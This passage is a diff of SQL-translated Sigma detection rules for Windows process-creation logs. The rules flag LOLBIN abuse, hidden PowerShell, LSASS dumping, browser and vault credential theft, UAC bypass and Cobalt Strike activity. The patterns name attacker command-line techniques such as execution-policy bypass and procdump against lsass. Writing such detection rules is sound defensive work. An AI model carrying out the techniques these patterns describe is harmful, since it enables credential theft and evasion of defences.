ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" + }, + { + "title": "PUA - WebBrowserPassView Execution", + "id": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", + "status": "experimental", + "description": "Detects the execution of WebBrowserPassView.exe. 
A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera", + "author": "frack113", + "tags": [ + "attack.credential_access", + "attack.t1555.003" + ], + "falsepositives": [ + "Legitimate use" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% -Encoding %' ESCAPE '\\') OR ((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Web Browser Password Viewer' OR Image LIKE '%\\\\WebBrowserPassView.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_encode.yml" + "filename": "proc_creation_win_pua_webbrowserpassview.yml" }, { - "title": "Regsvr32 Flags Anomaly", - "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", - "status": "test", - "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Arbitrary Command Execution Using Msdt.EXE", + "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", + "status": "experimental", + "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", 
"tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" + "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" }, { - "title": "Suspicious PowerShell Parameter Substring", - "id": "36210e0d-5b19-485d-a087-c096088885f0", + "title": "Application Whitelisting Bypass via Bginfo", + "id": "aaf46cdc-934e-4284-b329-34aa701e3771", "status": "test", - "description": "Detects suspicious PowerShell invocation with a parameter substring", - "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", + "description": "Execute VBscript code that is referenced within the *.bgi file.", + "author": "Beyu Denis, oscd.community", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059.005", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR 
CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' 
ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE 
'\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\bginfo.exe' ESCAPE '\\' AND CommandLine LIKE '%/popup%' ESCAPE '\\' AND CommandLine LIKE '%/nolicprompt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" + "filename": "proc_creation_win_lolbin_bginfo.yml" }, { - "title": "New Remote Desktop Connection Initiated Via Mstsc.EXE", - "id": "954f0af7-62dd-418f-b3df-a84bc2c7a774", - "status": "experimental", - "description": "Detects the usage of \"mstsc.exe\" with the \"/v\" flag to initiate a connection to a remote server.\nAdversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). 
The adversary may then perform actions as the logged-on user.\n", - "author": "frack113", + "title": "New Firewall Rule Added Via Netsh.EXE", + "id": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "status": "test", + "description": "Detects the addition of a new rule to the Windows firewall via netsh", + "author": "Markus Neis, Sander Wiebing", "tags": [ - "attack.lateral_movement", - "attack.t1021.001" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "WSL (Windows Sub System For Linux)", - "Other currently unknown software" + "Legitimate administration activity", + "Software installations and removal" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND CommandLine LIKE '% /v:%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lxss\\\\wslhost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Microsoft\\\\WSL\\\\wslg.rdp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% firewall %' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\' OR CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\thor64.exe' ESCAPE '\\' AND CommandLine LIKE '%advfirewall firewall show rule name=all%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_mstsc_remote_connection.yml" + "filename": "proc_creation_win_netsh_fw_add_rule.yml" }, { - "title": "Suspicious File Download via CertOC.exe", - "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", - "status": "experimental", - "description": "Detects when a user downloads file by using CertOC.exe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Ping Hex IP", + "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "status": "test", + "description": "Detects a ping command that uses a hex encoded IP address", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_certoc_download.yml" + "filename": "proc_creation_win_ping_hex_ip.yml" }, { - "title": "LOLBIN From Abnormal Drive", - "id": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", - "status": "test", - "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "title": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code", + "id": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", + "status": "experimental", + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", + "author": "frack113", "tags": [ - "attack.t1218.001" + "attack.defense_evasion", + 
"attack.t1218", + "attack.t1216" ], "falsepositives": [ - "Rare false positives could occur on servers with multiple drives." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\') AND NOT ((CurrentDirectory LIKE '%C:\\\\%' ESCAPE '\\' OR CurrentDirectory = '') OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\SyncAppvPublishingServer.vbs%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_not_from_c_drive.yml" + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" }, { - "title": "Suspicious Schtasks From Env Var Folder", - "id": "81325ce1-be01-4250-944f-b4789644556f", - "status": "experimental", - "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", - "author": "Florian Roth (Nextron Systems)", + "title": "MMC Spawning Windows Shell", + "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "status": "test", + "description": "Detects a Windows command line executable started from MMC", + "author": "Karneades, Swisscom CSIRT", "tags": [ - "attack.execution", - "attack.t1053.005" - ], - "falsepositives": [ - "Benign scheduled tasks creations or executions that happen often during software installations", - "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" + "attack.lateral_movement", + "attack.t1021.003" ], "level": "high", 
"rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE 
'%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR Image LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_env_folder.yml" + "filename": "proc_creation_win_mmc_susp_child_process.yml" }, { - "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "07aa184a-870d-413d-893a-157f317f6f58", - "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". 
Which can be used to gather information about the target machine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Credential Manager Access via VaultCmd", + "id": "58f50261-c53b-4c88-bd12-1d71f12eda4c", + "status": "experimental", + "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VaultCmd.exe' ESCAPE '\\' OR OriginalFileName = 'VAULTCMD.EXE') AND CommandLine LIKE '%/listcreds:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_gather_network_info_execution.yml" + "filename": "proc_creation_win_vaultcmd_list_creds.yml" }, { - "title": "Suspicious RazerInstaller Explorer Subprocess", - "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "title": "UAC Bypass via Event Viewer", + "id": "be344333-921d-4c4d-8bb8-e584cf584780", "status": "test", - "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", + "description": "Detects UAC bypass method using Windows event viewer", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1553" + 
"attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (Image LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\SysWOW64\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" + "filename": "proc_creation_win_uac_bypass_eventvwr.yml" }, { - "title": "Potential Meterpreter/CobaltStrike Activity", - "id": "15619216-e993-4721-b590-4c520615a67d", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Potential LSASS Process Dump Via Procdump", + "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "status": "stable", + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. 
This way we're also able to catch cases in which the attacker has renamed the procdump executable.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.defense_evasion", + "attack.t1036", + "attack.credential_access", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Commandlines containing components like cmd accidentally", - "Jobs and services started with cmd" + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" + "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" }, { - "title": "Use of OpenConsole", - "id": "814c95cc-8192-4378-a70a-f1aafd877af1", + "title": "Use of Remote.exe", + "id": "4eddc365-79b4-43ff-a9d7-99422dc34b93", "status": "experimental", - "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Remote.exe is part of WinDbg in the 
Windows SDK and can be used for AWL bypass and running remote files.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Legitimate use by an administrator" + "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'OpenConsole.exe' OR Image LIKE '%\\\\OpenConsole.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.WindowsTerminal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\remote.exe' ESCAPE '\\' OR OriginalFileName = 'remote.exe'))" ], - "filename": "proc_creation_win_lolbin_openconsole.yml" + "filename": "proc_creation_win_lolbin_remote.yml" }, { - "title": "CobaltStrike Load by Rundll32", - "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", - "status": "test", - "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", - "author": "Wojciech Lesicki", + "title": "HackTool - TruffleSnout Execution", + "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", + "status": "experimental", + "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE 
